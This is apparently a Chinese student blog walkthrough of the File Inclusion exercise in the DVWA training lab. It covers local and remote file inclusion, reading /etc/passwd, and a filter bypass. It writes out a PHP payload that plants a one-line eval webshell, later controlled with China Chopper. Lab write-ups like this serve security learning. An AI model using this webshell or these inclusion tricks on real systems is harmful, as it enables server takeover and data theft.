DVWA中的File Inclusion(文件包含)

最新推荐文章于 2023-05-22 10:55:02 发布
最新推荐文章于 2023-05-22 10:55:02 发布
阅读量468 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hwy2506451901/article/details/105305938
版权

最近课上用到了DVWA,通过学习总结了文件包含部分的内容,以下是个人的总结,因为刚刚入门 所以写的比较详细,希望对刚学习这一部分的朋友们有所帮助。
原理:PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。
类型:本地文件包含,远程文件包含(相对较容易)
提示:upload路径:/var/www/dvwa/hackable/upload
inclusion路径:/var/www/vulnerabilities/fi
在kali中粘贴可以使用ctrl+shift+v
在/var/www/dvwa/下有一个文件为robots.txt,是敏感文件,意思是爬虫网站的时候设定的一些规定,规定哪些不能爬
删除文件的命令是rm -rf c.php
1.low级别
(1)本地包含(LFI)+生成webshell:本地包含顾名思义,就是在网站服务器本身存在恶意文件,然后利用本地文件包含使用.。
源码中没有任何防御措施,于是我们可以先进入到fi目录下将page=include.php改为y.txt,使用vim y.txt编辑内容为wenying,然后在地址栏执行发现可以看到内容:
在这里插入图片描述在这里插入图片描述说明可以将y.txt文件包含进来,于是我们可以建一个php文件试试:<? php info();?>打开发现也可以:

在这里插入图片描述我们看看执行命令可不可以:/etc/passwd
在这里插入图片描述
在这里插入图片描述
那么如何生成webshell呢?可以通过在上传的图片里加入一句话木马,如果有文件上传漏洞同时又有文件包含漏洞,就会在文件包含目录里生成shell,用到工具:edjpgcom 是一个编辑图片的软件,使用的时候将图片拖入到edjpgcom.exe中,然后写入php代码:
<?fputs(fopen("shell20.php","w"),’<?php @eval($_POST[wenying]);?>’)?>前部分的fopen是一个函数,意思是打开shell20.php,然后将后面部分的一句话木马写进去。
在upload中上传这个图片
在这里插入图片描述
将这个图片的路径复制到文件包含的page后打开发现乱码,表明此php代码已经传到了文件包含中生成了shell,进到owaspbwa的文件包含目录中查看是否生成:
在这里插入图片描述
在这里插入图片描述
可以看到shell20.ph,所以我们就可以使用菜刀了
在这里插入图片描述
新建后右击选择文件管理,可以找到我们上传的文件,进行删除或等操作:
在这里插入图片描述

(2).远程文件包含漏洞(RFI)+shell
远程文件包含就是调用其他网站的恶意文件进行打开
我们打开kali建立服务器:
打开apache2并查看是否开启
在这里插入图片描述
在html下编辑一个文件
在这里插入图片描述
写入一句话木马:
在这里插入图片描述
:wq保存退出
可以查看路径是否正确
在这里插入图片描述
复制目录到文件包含的page后
在这里插入图片描述
再到文件包含目录检验是否生成shell50,可以看到生成了。
在这里插入图片描述
同样的操作我们可以使用菜刀连接,这里我们可以配置数据库信息如下:
在这里插入图片描述
右击点数据库管理就可以查看数据库的信息了
在这里插入图片描述
2.medium级别:
在这里插入图片描述
查看源代码发现将http://,https://过滤掉了,那我们可以继续使用本地包含的方法,或者我们可以二次重写进行绕过:
在这里插入图片描述
仅将中间的http://过滤,两边还是可以组成新的,查看fi目录还是可以看到生成了shell60.php:
在这里插入图片描述

回首。阑珊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA-----------File Inclusion
haha1314的博客
05-19 439
文件包含漏洞 开发人员将相同的函数写入单独的文件,需要使用某个函数时直接调用此文件,无需再次编写,这种文件调用的过程称文件包含; 开发人员为了使代码更灵活,会将被包含的文件设置为变量,用来进行动态调用,从而导致客户端可以恶意调用一个恶意文件,造成文件包含漏洞;在PHP经常出现文件包含漏洞; 常用函数 include():找不到被包含文件,报错,但会继续运行脚本; include_once():...
Dvwa练习04 File Inclusion文件包含
coco3105的博客
02-09 1312
本地文件包含,远程文件包含,文件读取及代码执行
DVWA系列之14 文件包含漏洞分析
weixin_34284188的博客
11-14 162
程序开发人员通常会把可重复使用的函数写入到单个文件,在使用某些函数时,直接调用此文件,而无需再次编写,这种调用文件的过程一般被称为包含。程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。 PHP提供了四个文件包含的函数,分别是include...
DVWAFile Inclusion(文件包含)
谢公子的博客
10-01 9731
目录 LOW: Medium: High Impossible LOW: 源代码: &lt;?php // The page we wish to display $file = $_GET[ 'page' ]; ?&gt; 可以看到,low级别的代码对包含的文件没有进行任何的过滤!这导致我们可以进行包含任意的文件。 当我们包含一个不存在的文件 haha.php ,看看会发生...
DVWA-File Inclusion
weixin_44866139的博客
02-07 287
文件包含是指应用程序加载的文件(本地/远程)可以由用户提交的数据控制,从而导致攻击者控制恶意文件在服务器上执行. 对于php来说,常见的文件包含函数有如下: require:找不到被包含的文件,报错,并且停止运行脚本。 include:找不到被包含的文件,只会报错,但会继续运行脚本。 require_once:与require类似,区别在于当重复调用同一文件时,程序只调用一次。 include_...
DVWAFile Inclusion
Sukiugg的博客
07-28 234
1. url改为: http://192.168.131.148/dvwa/vulnerabilities/fi/?page=/etc/passwd
文件包含漏洞、DVWA-File Inclusion
weixin_41487522的博客
06-30 380
文件包含漏洞 什么是文件包含漏洞? 攻击者利用包含的特性,加上应用本身对文件(包含)控制不严格,最终造成攻击者进行任意文件包含。 (包含的文件会被当做脚本文件来解析) 一句话来说就是:文件包含并不属于漏洞,但是,由于对包含进来的文件不可控,导致了文件包含漏洞的产生。 包含文件很有用,可以简化代码 文件包含分为本地和远程文件包含(需要allow_url_include=On) 本地文件包含LFI 远程文件包含RFI 函数解析 这里我们需要了解4个PHP的函数 include:使用include引用外部文件时,
靶场练习:DVWAFile Inclusion文件包含)操作/代码解析
night7i的博客
04-15 398
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
DVWA系列之File Inclusion(文件包含)源码分析及漏洞利用
7Riven's blog
11-27 1273
什么是文件包含? 程序开发人员通常会把可重复使用的函数写到单个文件,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含文件包含漏洞的成因 随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变 量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过...
DVWA】--- 四、文件包含(File Inclusion)
qq_43168364的博客
05-31 538
sh
DVWA练习之File Inclusion
dz919908651的博客
08-22 1372
DVWA练习之File Inclusion 本博客将记录在web安全问题一种常见的漏洞——“文件包含”漏洞的实践演练。首先阐述文件漏洞的概念,原理,最后展示基于DVWA的各种等级的文件包含漏洞。 文件包含 概念:指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数,利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任...
DVWA系列File Inclusion
crystal919的博客
03-26 302
File Inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞,远程...
dvwaFile Inclusion
Alsn86的博客
02-04 750
dvwaFile Inclusion 进行包含的文件名由get方法的page参数传递 看一下包含的流程吧 index.php <?php define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' ); require_once DVWA_WEB_PAGE_TO_ROOT . 'dvwa/includes/dvwaPage.inc.php'; dvwaPageStartup( array( 'authenticated', 'phpids' ) ); $page =
DVWA-File Inclusion文件包含
Cwillchris的博客
10-28 2318
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: FileInclusion,意思是文件包含(漏洞),是指当服务器开启 allow_url_include选项时,就可以通过php的某些特性函数(include(), require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。.
DVWAFile Inclusion
chtdgf的博客
02-23 140
DVWAFile Inclusion 1.LOW级别 1.PHP代码分析 我们可以通过 View Source获得代码如下 <?php // The page we wish to display $file = $_GET[ 'page' ]; ?> 服务器获取 page 的值,没有进行任何过滤。 二 MEDIUM级别 1.PHP代码分析 我们可以通过 View Source获得代码如下 <?php // The page we wish to display $file
DVWA学习之File Inclusion文件包含漏洞)
weixin_40950781的博客
08-18 2411
DVWA学习之File InclusionFile Inclusion文件包含)0x01 何为File Inclusion?1.简介2.相关函数3.文件包含功能4.相关知识5.文件包含漏洞的一般特征6.文件包含的测试0x02 low级别0x02 medium级别0x03 high级别0x04 impossible级别0x05 文件包含漏洞的利用0x06 防御方法 File Inclusion(文...
DVWA —— File Inclusion 文件包含
最新发布
YouTheFreedom的博客
05-22 1655
web 程序引入一段用户能控制的脚本或代码,并让服务器端执行 include() 等函数通过动态变量的方式引入需要包含的文件,用户能够控制该动态变量,实现本地文件包含或者远程文件包含
DVWA靶场系列(三)—— File Inclusion文件包含
qq_45612828的博客
07-12 1117
DVWA靶场系列(三)—— File Inclusion文件包含
DVWAFile Inclusion
baynk的博客
10-29 877
汇总链接: https://baynk.blog.csdn.net/article/details/100006641 ------------------------------------------------------------------分割线------------------------------------------------------------------ File...
dvwa file inclusionfile upload
05-12
包括文件包含File Inclusion)和文件上传(File Upload)两种漏洞。 文件包含漏洞是指Web应用程序未对用户输入的文件路径进行充分验证,导致攻击者能够构造恶意的文件路径来读取、执行或删除服务器上的敏感...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值